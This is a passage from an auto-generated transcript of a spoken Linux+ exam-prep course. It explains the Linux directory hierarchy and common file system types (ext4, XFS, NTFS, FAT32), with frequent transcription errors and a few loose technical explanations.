questions and the candidates that uh take this exam they have 90 minutes to complete the examination and the passing score typically varies depending on the version but it’s around 720 out of 900 720 out of 900 is 80% so this is not something that you can get a c around or something like that so if you get 721 1 you pass if you get 720 you pass but it’s Approximately 80% is what you’re trying to accomplish here the main domains that are covered our system management so how to install configure and manage Linux systems security which is implementing security best practices and understanding the Linux system security requirements there’s scripting and automation for Shell scripting to automate tasks and manage resources which actually whether or not you take this it’s so powerful to be able to automate uh activities on Linux and just in general learning how to automate things is very very it’s good for you it’s good for your life um networking and storage management configuring troubleshooting the network the storage as well as share resources and performance and monitoring so monitoring the system performance and implementing logging these are going to be the main domains the main categories that are covered when you are going through uh the Linux plus certification and under this false troubleshooting under this false system administration so on and so so forth so uh these things we’re going to go through all of that stuff so that you have a very very good fundamental good foundation and then you actually get into the intermediate and advanced things as well the prerequisites are none actually there are no strict prerequisites but uh prior experience in Linux is actually very useful in this um although we will go through all of the introductory and intermediate stuff as well so all the beginner level stuff we are going to cover as well there’s actually a series of videos that I’ve done on Linux fundamentals and Linux Basics on this channel and they’re relatively short compared to what this video is going to end up being so if you want to go check those out just to kind of give you a you know a foot in the water dipping your toe in the water so to speak that would be useful if you get uh the CompTIA A Plus or network plus that’s also super useful but there are no actual strict requirements or prerequisites to get into this uh mostly because the fact that we’re going to be touching a lot of the fundamentals for all those requirements anyways but uh the better introduced you are to this the more familiar you are with this uh you’re going to have an easier time for the rest of it and you’re just going to get a lot of the information reing grained in your mind and reaffirmed and you’ll get a really strong understanding of everything that goes on all right so let’s get into the system architecture and the boot process and first in that regard is going to be understanding the directory structure and the file system hierarchy of Linux one of the common things that you’re going to to hear a lot as we go through this tutorial is going to be the FHS the file system hierarchy standard and we’re going to be referring to this frequently so the FHS defines the Linux hierarchy structure and what each folder is commonly used for and so the key directories that you see on your screen right here these are the big directories for Linux installations and for the most part these things always come pre-installed every time that you install Linux uh there’s going to be a difference between primary and extensions and log logic type of directories but these things are all falling under the key directory so you have the root the bin or also known as the binary and then you have the spin which is s uh system binary you have the ETC which is typically used for configuration files you have the home that houses all of the users you have the ver log the variable log that houses a lot of actual logs and variable Dynamic data you have the user folder that also houses user data you have the optional stuff and then you have the development uh directory that has a lot of the source uh as well as the virtual environments as well and then you have a temp folder that houses temporary data that typically gets wiped on reboot and these are our main key directories now the root directory is the top level directory the root is literally the root for the entire system so all of the other directories in FHS are inside of the root directory and they are technically all just extended ions of the root directory they’re organized hierarchically under the root subdirectories Branch out and then more under them and so on and so forth so they just keep getting more and more uh subcategorized under the root the root directory is owned by the root user who has complete control over the root directory and by extension the entire machine the structure and contents are crucial for a system stability and security meaning that you don’t want to mess with this unless like you really know what you’re doing you don’t want to mess with any of it because most likely if you do anything if you delete something accidentally if you modify something accidentally you’re going to mess the entire thing up and then you have to reinstall Linux and then there’s the software packages that are installed and their files and specific directories under the root directory CIS admins often work directly with the root directory to configure and maintain the system so this is the the mother right this is like the basic the very very main directory the the home of everything is the root and it’s represented by this singular forward slash the bin or the binaries directory contains essential binary executables that are needed during the boot process or in single user mode so it’s generally accessible to all the users and it houses all of the basic uh binaries so for example the ls command also known as the ls binary the cat command the CP the MV RM so LS is listing all the files and directories cat concatenates and displays the contents of a file onto your terminal CP copies files and directories MV moves or renames Co files and directories RM removes files and direct and these are just a few of them there’s many there are dozens of binaries that are included inside of the bin folder the binaries folder the sbin is known as the system binaries folder and this is the binary executables that are used for system administration it typically requires root privileges to execute this so it’s not accessible by everybody and since they involve system level changes it’s very very important that you know what you’re doing uh for the most part you’re probably going to be using your own version of Linux on your home computer to go through all of this so you’re not going to be in an Enterprise environment to do this so even you are going to be the root user that gets access to the system binaries you don’t want to mess with these things right so the the Fisk binary for creating partitions and the fs check for file system check um for in it initializing the system rebooting shut these are very very important binaries you don’t want to mess with these these are not things that you should even try to open or manipulate or unless you are super Advanced which if you’re watching this you aren’t so just be very very careful with the binaries just leave these alone you know uh for the most part as long as your your intrusion detection system or your antivirus or uh any of those security appliances don’t give you any kind of an error or an alert that has to do with this for the most part you’re not going to be interacting with the system binaries it’s just good to know what it houses and it is the part that uh primarily houses the system administration the binary executables that are relevant to your system and this is not accessible by anybody other than the root user that’s what you need to mainly keep in mind then we have the the variance the difference between these two right so you have the binaries folder that typically all users get access to the system binaries folder is only accessible by the root user the purpose of the binaries is essential user commands like LS and CP so on and so forth the system binaries are for system administration the execution timing so early boot process or single user mode is when binaries are actually launched and executed the system binaries are for system maintenance and administration so they actually manually are booted and uh used or activated executed and they’re not done automatically by the system so for example uh creating partitions is is going to be done manually by the root user as they try to create partitions or when you go through the primary installation and you’re assigning the various partitions that you want that’s when those things are going to be executed apart from that unless you do need any of those binaries they’re not going to be activated or executed so these are the main differences between binaries and system binaries so that you have a good understanding of what they actually are the Etsy so the configuration binary or not binary sorry folder the Etsy folder folder directory uh houses configuration files for a lot of different services and applications and these could be the things that you also install manually uh this is known as the control center and the contents of etsy can vary depending on the Linux distribution that you got and the software that’s installed so uh it again houses the stuff that comes preconfigured inside of the system as well as the stuff that you download and install into your system etsy’s containers or etsy’s directories are things like the Etsy pass password that actually houses all of the user account information but it doesn’t show you anything for password hashes so it’ll show you just an X for that the Etsy Shadow file is going to show the uh user password hashes so this is these two are very very important in the concept of cyber security and ethical hacking these are very very important files and then you have the Etsy group that has the group information the Etsy host for example the host name and the IP address mappings the host name itself which is the system host name you have the edsy res configuration file that has the DNS resolver configurations and you have the Etsy network interfaces that has the network interface configuration and you’ll see what that means when we actually run a couple of these networking commands just so you can see what those things mean and then we have the Etsy system control configuration that has the system kernel parameters and again you’re not going to be messing with this uh maybe at some point you might be messing with the DNS resolver configuration maybe you might be messing with the network interface configuration for the most part you’re not going to be messing with any of these things directly uh unless you’re doing pen testing or ethical hacking exercises where you would manually try to add a user uh to the Etsy Shadow file or the Etsy password file something like that but the interaction that you’ll have with all of these files will be through individual commands that will add or remove uh entries from some of these files and that’s how you will interact with them it’s very rare that you’ll actually open these files directly and interact with the file directly you’ll probably use one of those binaries that we talked about earlier to interact with these files the service configurations are like such so if you have an Apachi web server that’s installed that would also be inside of the Etsy folder and it’ll be Etsy Apachi and then if it’s in Jinx it’ll be Etsy in Jinx uh if you have a mySQL database installed that’s what it’s going to look like if you have the postresql installed that’s what it’s going to look like so these are the configurations for Individual Services right so uh it houses configuration files for the system Sy Services as well as anything that was installed on the the machine itself so MySQL may not necessarily come installed on your system you may install it and then when you do that configuration drive or uh directory that configuration directory as well as its individual configuration files are going to be installed inside of the Etsy directory and of course package manager so very similar to the previous uh slide that we were on apt the AP package manager resources or the Yum package manager resources these are uh dependent on the type of Linux that you’re running um so app typically comes with Ubuntu yum typically comes with uh Centos or red hat but these are the package managers that come that you can use to uh install various uh packages as well as software and applications and we’ll get deeper into that when we actually get to that slide but typically again these things are all included inside of the Etsy folder so as a final note why is the Etsy folder important well there’s system Behavior so all the configuration files directly influence your actual systems Behavior the security is very important as we talked about the Etsy password and the Etsy Shadow files specifically are really really import important so um if there’s misconfigurations that are done to any of these configuration files that poses a security risk but then there’s actual data that is inside of these configuration files that if mishandled or accessed by somebody that shouldn’t have access to is going to pose a massive security risk um there’s customization so you can customize the system by editing these particular files if you want to append to them you could use it uh doing various binaries or you could just open some some of these things up and directly uh append or uh manipulate the data that’s inside of them I wouldn’t do it against the actual system important stuff so if we go and talk about those individual softwares that were installed you can customize those by opening them inside a text editor but for the system uh related uh configuration files I would only use specific binaries unless I know exactly what I’m doing I would not open those files directly I would use the system binaries because the system binaries also give you the messages if you made an error in something or uh with the syntax of something they’ll tell you exactly what you need to do so you’ll get a lot of help with the terminal itself when you use the binaries instead of opening the document or opening the file and trying to configure it manually and of course troubleshooting so any system problems that can be resolved by modifying configuration files so at the same time vice versa of that a lot of system problems can be caused by incorrectly modifying configuration files so again just notes take notes be you know be warned I gave you the disclosure right so just be careful as you manipulate those data points and again so we have an individual slide for the caution so always back up the configuration files uh be mindful of the file permissions incorrect permissions can lead to system instability or incorrect permissions can lead to hacking that takes place um ensure that the configuration has the correct syntax to avoid any errors and of course test these things in a controlled environment before deploying them to a production system this is more relevant to somebody who’s actually working inside of some kind of a company and is hired as the system administrator so before launching it to the 500 or 5,000 employees inside of the company before deploying it to a production system that’s what that means before you actually deploy it to the entire company you need to test it on one machine in a controlled environment to make sure everything is all good and there are no glitches or errors or security vulnerabilities and once that’s been approved and everything’s taken care of then you deploy it to the rest of the company so that’s what that means you got to test it before you submit it and deploy it to the entire system to the entire production environment the home directory is where user accounts are stored and an individual user account so for example if you have user one this would be the directory for user one and then inside of that directory is going to be a bunch of information that’s just relevant to user one and typically it’s only accessible by user one or at least somebody who has user one’s password so user accounts are housed inside of the home primary location for files documents settings configuration Etc uh the key directories inside of it are going to be these and you’ve probably seen these so this also is very similar to what happens in a Microsoft uh environment where each user has their own documents folder and a downloads folder they have a music folder pictures public videos so on and so forth for the most part all of these things are only accessible to that user except the public folder the public folder is used to share files with other users and typically it’s accessible by everybody else that’s on that system as well but all of these individual folders right here are usually only accessible by that specific user uh user ownership has to do with their home directory and everything that’s inside of that home directory is owned by that user by default only that user and the root user have full access to the home directory as well as the stuff that’s for that specific user so it ensures privacy it ensures security um a user can customize their home directory to essentially do whatever they want um so long as they don’t install anything or do anything that would ruin the entire system itself they can essentially do whatever they want inside of their directory they can store whatever they want inside of their directory as long as they don’t pass their storage limits which typically if they do they just get notified and they have to remove some stuff and delete some stuff so that they open up some more storage space and by default the home directories are protected from unauthorized access um by anybody who does not have root permissions or is not on the sudo’s list or does not have the username and password for that specific user the notable notes here are that you want to back up these things regularly uh to just make sure in case anything happens with a system crash or something you can just recover all of that stuff um the file permissions are again very important so file permissions is another one of those things that is going to come up very regularly as we go through the rest of these videos and it’s Mo it falls under security so file permissions um have to do with if somebody is supposed to access this should access it if somebody’s not supposed to access it they should not be able to access it very simple it’s not it’s not a complicated process it’s just something that needs to be kept in mind and as you navigate and administer administer a Linux machine or a Linux environment this is some of the stuff that you really need to be uh be uh considered for or consider uh to just make sure that none of these things uh happen and nobody accesses these things when they’re not supposed to and we’re going to go through those individual file permission commands and how to set file permissions so on and so forth uh storage limits as we already talked there is going to be definitely storage limits and uh the users uh are supposed to maintain their own storage limits and not or not maintain them but they’re supposed to keep their storage limits in mind so that if they ever hit a storage limit they can delete data and make some more room but each user is going to get a storage limit so that the overall system and the overall environment doesn’t get maxed out and of course I mean keep it organized if you can but I know some people that have a really really freaking overwhelming like scary looking desktop because it’s just a bunch of files on the desktop there is zero organization and it’s like how do you find anything here and they’re like no no no I know where everything is at yeah I’m like all right bro if you know where it’s at then fine but if I am your manager I’m going to be like you need to learn how to organize all your stuff so that’s basically it so V or variable data I call it Devar it’s just it’s weird I don’t know the pronunciation is weird to me but whatever the VAR directory the VAR folder uh it stores variable data so this could be the system logs because system logs are constantly updated with new activity it could be temp files it could be mail spools it’s essentially Dynamic data that changes frequently or uh variable data as the name implies um these are some of the key directories inside of the VAR directory so you have the log directory that houses all of the system and application logs and it can be very very important that’s another one of those locations where we refer to regularly when we’re doing incident response in cyber security or when we want to do troubleshooting if a system crash happens or unexpectedly so it’s a very very important directory the VAR log directory is very important the our mail directory stores all the incoming mail for the users the spool directory contains various services including print jobs mail and news the lib has the state information for various services and applications and then you have the temp that is inside of the V directory which should not be confused with the actual temp directory which we’re going to cover in a few slides so it stores temporary files created by various applications that will be inside of this specific directory so inside of thear directory there is a temp directory that stores temporary files by various applications then we have the importance of this thing so as you can imagine Health monitoring by looking at the log files inside of that directory is very very important so it gives you the data that’s necessary to uh reverse engineer or backtrack what happened for system performance and any potential issues or attacks or anything that may have happened security analysis again same thing service operations so spool directories in the spool are very uh crucial to services like Printing and mail so if there’s some kind of an issue that is with your printer that isn’t the actual Hardware itself and there’s no connection with the wires or anything anything like that you may want to go over here to try to find out what is going on with uh the service itself why the operation of that printing is not working accordingly uh application States so the lib stores information needed for applications to maintain their state so whether or not they are enabled or disabled or if they have issues or glitching whatever it may be most likely it’s going to be inside of this specific directory for the application state so so the VAR lib directory is going to store information needed for applications to maintain their State uh important considerations would be regular cleanup of the temp directory to make sure that you don’t uh overload your storage uh rotate the files uh the log files regularly because log files can get massive if they are designed or if they’ve been configured to store data for a long period of time and I don’t care what the system is like uh for the most part any system can overload their log directory or the log contents very quickly if you don’t uh set it up to clean up so if you don’t set it up to wipe the log data or if you don’t back up the log Data before it’s wiped so on and so forth those log files can get very very large if the system is being used regularly log files can get really big uh permissions uh are very crucial again so right files and directories the permissions of those files and direct to protect system security somebody can get into your log directory and they can go into the authentication log and erase their tracks of being in your system that’s not good so they can actually get into your system they can do whatever they need to they put some kind of a root kit or something some kind of a Trojan or a worm something that they can connect to a C2 connection some kind of a shell something right they can get in your system house some kind of a connection where they can come in as they please and then they erase their tracks from your logs that’s not a good thing that is very very very bad and that should not happen because the permissions to those logs should be kept at a root level and uh a pseudo level so that people who are only an administrator should be able to access them and their password should be super complex so that somebody can’t just hack in their password by using a password cracking tool or something like that so permissions again as I’ve mentioned this is going to happen frequently so permissions to certain log files and just certain directories should not be accessible by anybody other than the root user and the administrators and of course backup whatever is necessary so not everything needs to be backed up but the important things should be backed up for example log files should be backed up and configuration files should be backed up that is all important stuff we have the user directory the user directory has user programs and libraries so anything that has to do with the programs of that user the libraries of data and any documentation typically stored here um they have the user bin so user binaries right the user sbin system binaries you have the user Library you have the local for locally installed software often outside of the actual package manager that we’ll be talking about the user share that has share data files like documentation icons and configuration files and of course the source code for various system utilities the binaries are accessible to all the users the system binaries are typically for system administration requiring root privileges so this same thing applies here so even the inside of the user folder the system binaries are typically only accessible by the root user the shared libraries used by programs the locally installed software often outside of the package manager these things are very similar to what you saw previously it’s just it happens to be for the individual user the root user will have their own directory so it’s not going to be something that you’ll see inside of the user directory it’s going to be forroot just by itself but the the user directory itself will have individual users other than the roots that will have all of that information stored in here so why is this important the program execution so in the binary and the system binary are essential for running programs uh shared libraries are used by multiple programs to reduce disk space and improve performance so if there’s been something that’s been installed that’s accessible to all the users it’s going to be inside of that directory so that it’s not duplicated across every single user taking up space so you have one installation but that’s now available inside of the lib the lib the library so that all of the users can get access to it instead of having multiple installations of the same thing uh software install packages install uh for the users are actually inside of the subdirectories of the user and a system documentation could be inside of the shared doc directory that contains documentation for system utilities installed software so on and so forth and what we’re talking about here is actual manuals for example how to use a specific uh software or utility the documentation for that is going to be inside of this system documentation so the user share Doc is going to house typically documentation and instruction manuals for the various utilities and so key points here there should be certain things that are readon so the user directory is mounted as a read only to prevent accidental modifications by somebody who should not be accessing it or should not have uh root privileges uh package management like AP and RPM they manage the installation and removal of software often modifying files within that user directory so instead of going and manually removing files or folders you would use one of the package managers and the the unin uninstall uh command that comes along with it that would be uh removing all of the software packages and all of the dependencies that comes with that software so uh rarely are you going to be accessing these things directly and trying to remove them directly which is why it says that there should only be readon permission so you should not have the permission to modify the contents inside of this it’s typically done by the various binaries that are inside of the system and some files in the user are accessible to all the users others may require root privileges to modify and that falls under file permissions and user access so again common themes you’re going to see this a lot so the reason why I keep saying them is because I wanted to like really embed in your brain as we go across this information so that you really really understand certain Concepts and then when you see the repeated themes you start understanding how all of these things actually connect to each other because CU it’s not complicated it’s most of this stuff is common sense you just need to know where certain things are housed and what the rules are for accessing them and giving permissions and so on and so forth so that is what we got there now we have the opt the optional software it stores additional software packages that are not part of the base system so optional software installations from third-party sources so uh let’s say OBS for example which is the software that I’m using to record this presentation that’s something that came from a thirdparty so software Third Party Source and that was installed so the contents of that the optional uh require all of that stuff is going to be inside of the opt folder for this particular software right there is a screen recording software that comes pre-installed with my machine but that’s not the one that I’m using so that uh content the content for that specific software are not going to be inside of this particular directory this is for the optional software that is coming from a thirdparty source so just keep that in mind it’s the optional configuration files or software installations or anything else that has to do with stuff that comes from a third party source and I I’m actually going to correct myself it’s not the configuration file so as we mentioned earlier configuration files would actually be inside the Etsy folder this is just the additional software packages that have been installed so it would be the packages the actual uh the use f uh packages of that particular software that are going to be in here the configuration file for that software would be inside of the Etsy directory why would you use this so it keeps the optional software separate from the base system which makes it easier to manage and remove um it prevents conflicts between different software packages that’s why we isolate them and it’s flexible so it allows for easy installation it allows for easy removal of the optional software and you can technically come in here and manually remove them but even if you have installed something uh and it ended up in here I would highly recommend just using the same package installer to remove it unless there was some kind of an install file that you downloaded from a place and then you used uh a package uh manager I mean I it I feel like it always comes down to the package manager so there especially in a Linux environment that doesn’t have a GUI a graphic user interface if it’s like a Linux server or something something you’re not going to get a install file that you would double click on and then you open the double you open the install file with the double click and then it goes through the installation Wizard and then you just click next or something it doesn’t work like that if you’re using the command line interface you’re typically using the package manager to install something which means that you would most likely use the package manager to remove something so this is uh more so for the system itself but again you just need to know uh what purpose this serves the optional software the opt has to do with thirdparty software that’s been downloaded therefore it keeps all of that stuff separate from the base system the system binaries and the base installations which makes it easier to manage and remove and it isolates everything so if there’s something wrong you can backtrack and try to find exactly where that problem came from and of course it’s flexible for easy installation and removal of that stuff the typical structure uh like looks like this so if you actually install something in the opt uh it typically creates a directory named after the software so for example MySQL so there would be a MySQL directory for the MySQL software and then it will house the software’s binaries libraries and configuration files and data and for the most part most likely there’s going to be also something that would be inside of the Etsy folder so you’ll actually have MySQL inside of the opt as well as the Etsy folder that would have to do with the configuration files of that however in this particular location it also houses the libraries it also houses the data it also houses the software binaries as well as the configuration files whereas inside of the Etsy folder it just has the configuration files so keep that in mind inside of the opt MySQL it has everything including config files inside of the Etsy MySQL it only has the config files so just keep that in mind key points here ownership and permission the ownership and permission files and directories within opt can vary depending on the software so if the user installed it versus if the root installed it that could determine the the direction of the permissions and the ownership uh package management software packages can be installed using the system package manager others may require manual installation that’s typically in some kind of a uh gu environment based on what I’ve experienced so far sometimes you use another command line tool that is not the actual package manager itself so for example it’s not a or apt it’s not that so there is some other kind of command line tool if you’re only in a command line environment um so sometimes that may be the case but for the most part I’ve actually only used the package manager to install packages and the dependencies for those uh tools and utilities um uh unless I was inside of a GU environment where there was some kind of a you know uh you double click it and you extract the files and then you click on the install file inside of that extraction and then it runs through the installation so on and so forth um then there’s a configuration for software installed in opt it’s often located within the software’s directory and then cleanup so when you remove software installed in opt it’s important to remove all the files and directories associated with that software so basically just just delete the entire directory instead of going inside of the directory and then in uh manually uninstalling things just uninstall everything that has to do with it if there’s data that you need to back up save and back up that data and then just wipe that entire directory that is the extension of opt so opt MySQL for example you would delete the entire MySQL directory to make sure that everything inside of that thing have also been deleted the dev directory houses the virtual device interface so a virtual ual file system that represents Hardware devices as files so it allows the OS to interact with Hardware devices using standard file operations so this could be like a printer for example so there would be the dev SDA or sdb that represents the hard disk drives so SD stands for standard dis and then it could be uh if you have multiple hard diss installed a would represent the first one B would represent the second one C Etc and it would just continue on from there there would be the CD ROM there is the USB drives right so it could be the external drives as well null is actually something that discards anything that’s written to it so when we run certain uh commands that we know they’re going to give us a lot of error messages we point those error messages to the dev null directory because it immediately just deletes those error messages because they’re unnecessary they do nothing to you and it’s mostly like permission denied to such and such resource when you do a find command this is actually what I use this for that that’s the only only time that I’ve used this specific directory for I’ll run a fine command and I know that from the results of the fine command there’s going to be a lot of data that’s going to pollute my screen and it’s going to hide the important data so it’s going to be like noise right and typically that data is permission denied to this permission denied to that and it’s all permission denied messages and then within a 100 permission denied messages there’s going to be two messages that have the data that I want and so I point all of that denied messages those error messages to the devn folder and then from there I can only look at the actual results so instead of seeing a 100 results I only see the two that apply to me because all the error messages go to the Devol folder um and then you have Dev zero which is a special file that produces an infinite stream of zeros and so far I have never used this thing I think it’s important from what I understand I mean it’s listed so I know that it’s important but I’ve never had a chance to actually use it so I’m very curious as to what that’s even for um but we just know that it does exist and so it’s a special file that produces an infinite stream of zeros and we can uh I mean I can I’m I’m actually going to pause the presentation real quick and I’m just going to do a Google search just to find out what the dev zero uh file is for all right so here’s what we got uh in Linux Dev zero is a special file located within the dev directory that essentially acts as a source of infinite null characters like asky value zero meaning when you read from it you will continuously receive zeros making it useful for initializing data storage with blank values which is why if it’s a blank value why do you need to store it whatever okay so key points about Dev zero the function is that it provides a stream of zeros whenever you try to read from it um the disk initial initialization would be the use case uh creating a completely blank dis by writing data from Dev zero to it okay that makes sense so if you want to initialize a dis creating a completely blank dis by writing data to it so you just pull a bunch of zeros from this thing and you write it to the disk memory allocation checking if a specific amount of memory can be allocated by attempting to read a certain number of bytes from Dev zero and then generating blank files creating a file with Zer is by redirecting output from Dev zero to a new file so it’s basically a storage of Z and then you you you pull that storage of zeros to either allocate testing or generate a blank file or initialize a dis that’s very interesting that’s like such a nerdy thing I didn’t even know that something like this existed but okay now we know very interesting so why is the dev folder important uh device abstraction by treating devices as files Linux provides a consistent interface for interacting with various Hardware devices so for example the file that is been assigned to a USB drive for example when you plug in the USB drive you now have a folder dedicated to the file system for that USB drive and then when you go inside of that folder you get to interact with the contents of the USB drive and this is more important in a command line environment because if you’re inside of a gue environment a graphic environment you just click on it and you get to see inside of the file browser that okay these are the contents of the USB drive but when you’re inside a command line environment only it turns it into a file system so that you can actually interact with the contents of it um device drivers which are software components that control Hardware devices create device files inside of Dev so the device driver which is the software components that control a hardware device so for example your printer has a driver that you need to install to be able to interact with that printer if you’ve ever insted inst a new printer it says hey you need to go download this the driver for this printer from our website and that’s how you get to interact with the the printer itself so that is housed inside of the dev folder the user interaction can access uh a user can access and control devices through these device files often using commands like dis duplicate or HD parm so on and so forth to be able to interact with the various uh extensions of the dev Direct directory and that is why this is actually important so it’s the virtual interface of a physical device typically so a USB drive a printer a hard disk on the computer so on and so forth this would be the virtual interface to interact with that physical device key points here are that the device files are often created dynamically when a device is plugged in or when the system boots so when you plug in your USB all of a sudden a little folder or file pops up that has to do with that USB uh access to device files may be restricted to rout or specific users depending on that specific device and the correct device driver might must be installed and loaded for a device to be accessible in Dev for example your printer USB drives typically don’t require device drivers but printers usually do so something that does something in the physical world typically has to have its own driver that comes installed and then that will be inside of the dev folder then we have the temp folder so the temporary file system it’s used to store temporary files created by various applications and system processes the files are typically deleted when the application or process finishes or when the system is restarted or rebooted the temp has write and execute permissions it’s a very popular Target for hackers most of the pen testing exercises that I have done have been they’ve had to do with you know creating a shell or some kind of a script that does some malicious activity creating it outside of the machine that I’m targeting and then taking that specific file and using something like w get or some kind of a python server to transfer it from my machine to the Target machine and then I put that file inside of the temp folder because the temp folder has right and execute permissions and I I can have no access to any of the other folders that we just talked about so the root folder obviously the home I can have literally no access to anything else but typically there is always access to the temp folder so if I drag and drop it or transfer my binary or the the the payload that I have inside of the temp folder then I can execute it from the temp folder so this is a very popular Target for hackers because of the fact that it has these permissions that typically come preconfigured you can obviously change this but for the most part it has right and execute permissions U mostly because the fact that it usually just deletes everything uh once the system has been rebooted so it’s not there’s nothing in here that’s permanent it’s a temporary file system so that’s why uh it has those permissions and that’s why it is such an attractive Target uh temporary storage is a convenient location for applications to store temporary files without cluttering the user’s home directory or other permanent locations and when you close the software those files get wiped from the temp folder when you restart the system those files get wiped uh system processes often use the temp folder to store temporary files during operations such as package installations or system updates and then they get wiped user applications such as web browsers and text editors also use the temp folder to store temporary files and then they get wiped so that’s why it’s like it’s probably one of the most volatile uh folders here because it’s just constantly changing based on the software that you’re using and the activity that you’re having so you don’t really uh you just none of these things are permanent It’s All Temporary some key points here there are automatic cleanup so many systems automatically clean up the temp directory on reboot or at regular intervals or when you close the software down or something like that security uh you got to be aware of potential security risk associated with the temp files because they contain sensitive information sometimes or that specific directory can be accessible fairly easily if necessary you can manually clean up the temp directory using commands like remove or remove RF meaning to reformat um however be cautious not to delete important files so again just be aware of certain things when you’re doing automatic cleanup or automatic wiping of something make sure there’s nothing in there that is important that you should have backed up before you wiped everything inside before you like digitally naal the entire thing and just wipe everything and so these are some of our other important directories the boot directory stores boot loader files Dev we’ve already talked about lid we’ve already talked about the mount directory uh houses the mount point for removable media um the proc is the virtual file system providing information about system processes and then the SRV contains data for services provided by the system and then there’s the system the CIS which is the virtual file system that has info about the systems Hardware so for example the CPU or the GPU so on and so forth so these are other important directories um however uh what we talked about is most likely going to be talked about very frequently you do need to know what is inside of these things you don’t have to know uh the nitty-gritty you don’t have to know all the finer details but you should be aware of these individual directories as well that are all a part of the file system hierarchy standard okay so now going into the file system types and mount points so these are our common file system types you have the xt4 xfs NTFS and fat 32 the xt4 is the fourth extended file system which is designed as the successor to xt3 and xt2 it’s a journaling file system for Linux and what that means is that it you it houses a journaling file system that basically it records everything that happens inside of the file system in in case the system crashes or there’s some kind of a power failure or something and it needs to pick up where it left off it maintains a journal so it supports large files um for example 16 terabytes in size which is freaking massive um it makes it suitable for storing large media files and databases it has the large file system support that can handle file systems of up to one exabyte in size accommodating massive storage needs enhances performance so improved performance especially for the large file systems and it can be extended so it’s designed to be extensible allowing for future enhancements and features and hopefully you can actually see the bottom part of this I’m not sure exactly if you can see that inside of the video but the bottom piece right here says extensibility the xt4 file system is designed to be extensible allowing for future enhancements and features so these are the key features that we have of the xt4 file system then there is the xfs file system the xfs file system also has journaling for high performance scalability and reliability it’s used for large file systems and high performance workload so this is typically for an Enterprise type of an environment uh it’s optimized for sequential read and write operations making it ideal for file servers and databases um it can handle file signs uh up to 8 exabytes in size so it’s pretty freaking massive um the xd4 very similar to the xt4 it uses journaling to ensure data in Integrity in case of crashes it can be scaled so it can handle a large number of files and directories that is really good for file servers with a lot of users so typically this is used for a central file server that a lot of remote users can access and it makes it very easy to scale up and house more files as well as give access to more users then there’s flexibility which has online file system res resizing and real time def fragmentation which makes the file system very flexible so you can actually make certain edits without removing uh permissions or without removing accessibility to it you can make certain modifications to the xfs file system so it’s typically used for large databases or data centers with many users the common use cases here are often used in high performance servers like the web server or the database server and file servers so server essentially it’s serves the data and other people can take the data from it so it can be one central location for example it would be the web server and then M multiple users can access that website it could be a database and multiple users can access that database it has the nas devices so network attached storage devices often use xfs to storage large amounts of data and then you have virtual machines like the xfs uh that can be used as the file system for virtual machine dis image images and just a quick note a network attached storage device is essentially a fancy name for a server so it it’s the physical uh server itself that uses the xfs file system to serve that data so it it stores a bunch of data that other people can access and it’s attached to a network meaning that is accessible via a network connection so that’s what an Nas device is and then it typically uses the xfs file system to be able to house that data to store that data so that other people people can get access to it the NTFS the new technology file system is actually a file system that’s been used in modern Windows operating systems it’s reliable it’s secure performs well the reason why you need to know this is that most often you’re going to need to format a drive that can interact with the NTFS system or at the very least you need to know what it is so that in the context of your interaction between Windows machines and Linux machines you need to know how to format a a file system or some kind of amount so that it can be accessed by both of these file system types right so if somebody is using a Linux machine and another person is using a Windows machine they both should be able to get access to your overall server they should be able to get access to your xfs file system for example so that they can pull whatever data they need from it so this is one of the reasons why we’re actually even talking about the NTFS the new technology file system um you know it’s secure it offers robust security features like Access Control list that allow granular control over the file and folder permissions it uses journaling very similar to everything else we’ve talked about to improve the integrity and recoverability of data uh it’s optimize for performance especially on Modern Hardware and it can can handle large file systems and large file support so it’s a very it’s a solid file system and it’s been used on the modern Windows machine so obviously this is a very very solid good file system it typically is only available so if something has been formatted for NTFS typically it can’t be accessed by a Linux machine that’s based on my experience at least so what you want is dual formatting and typically when you do something that can handle both of them it is not just NTFS just keep that in mind so NTFS is uh typically uh inherent to uh Windows right it’s uh very much so dedicated to Windows uh compression is one of the uh other features here um it can support file and folder compression to save disk space it allows you to encrypt files and folders to protect sensitive data meaning you use password protect files and folders and it has hard links and uh symbolic links it provides flexibility in file management a hard link is a direct reference to a file system essentially creating a duplicate entry for the same file data while a symbolic link link also called a soft link is a file that stores the path to another file acting like a shortcut that points to the original files location meaning with a hard link multiple file names can access the same data a symbolic link just points to the original files path on the system so for example a symbolic link could just be the desktop shortcut for example so that would be the main difference the hard link is a direct reference to a file on a system essentially creating a duplicate entry for the same data symbolic link is just a shortcut to that file right so a hard link duplicates the same exact thing puts it somewhere else a symbolic link or soft link is the shortcut that points to that file the common uses of NTFS would be the Windows operating system so it’s the default system for Windows nt2000 XP Vista 7 8 10 and 11 so the more recent versions of Windows uh many external hard drives are formatted with NTFS especially those that are designed designed for Windows system again so we’re referencing being able to use it by Windows um a lot of external hard drives are formatted as such so you want to make it uh formatted to access both types of machines so for example Mac OS as well as Windows so you need to reformat the hard drive uh USB drives can be formatted with NTFS to storage large files and folders and you can also reformat them to house both types of files so on and so forth so NTFS new technology file system some common use cases we have the fat 32 file system this is by far my favorite name for a file system so the fat 32 file allocation table 32 file system uh it was used in the early days of personal Computing it’s not as featur rich like NTFS or xt4 but it remains popular due to its Simplicity and Broad compatibility and it’s still used in a lot of environments um the key features is that it’s relatively simple which makes it easy to implement it’s compatible with a wide range of operating systems including Windows Mac OS various Linux distributions so it is cross formattable uh it has read and write access uh allowing you to create modify and delete files it does have a limited file size so it has a maximum file size that’s limited of 4 GB and a limited partition size for fat 32 meaning it’s 2 terab it’s still fairly big so 2 tbte file system or a 2 tab extension partition is not bad especially if you’re dealing with with just one person one user but most likely you’re not going to be using that inside of an Enterprise environment with a bunch of different users and a lot of different data so fat 32 for the most part is being used by one individual person for like a home computer or something like that or maybe a USB drive or an external hard drive that is maxed out at 2 terabytes the common use cases is the USB flash drive so commonly used for USB flash drives memory cards like digital cameras or other devices and external hard drives that only have a maximum of two terabytes typically use fat 32 and that’s actually what I did for uh most of my external drives cuz I don’t have external drives that go past 2 tabt so uh when I can I do go ahead and um format it for the fat 32 so that I can use it on both my Windows machine as well as my Mac OS and Linux machines all right now we can go into the system architecture which would be the kernel the shell and the user space so the kernel um it’s the core component of a Linux based operating system it’s basically the bridge between the hardware and the software layers managing system resources facilitating communication meaning that if you have you know if you put a request or we call it a call to the system if you send a call to your uh CPU to perform a certain action the kernel is that middle ground between whatever the software was that made that call and the actual CPU operating that call so it’s the middle ground it’s the bridge as it says between the hardware which is the CPU the GPU the motherboard so on and so forth and the software layers meaning your text editor for example when a text editor makes a certain call the 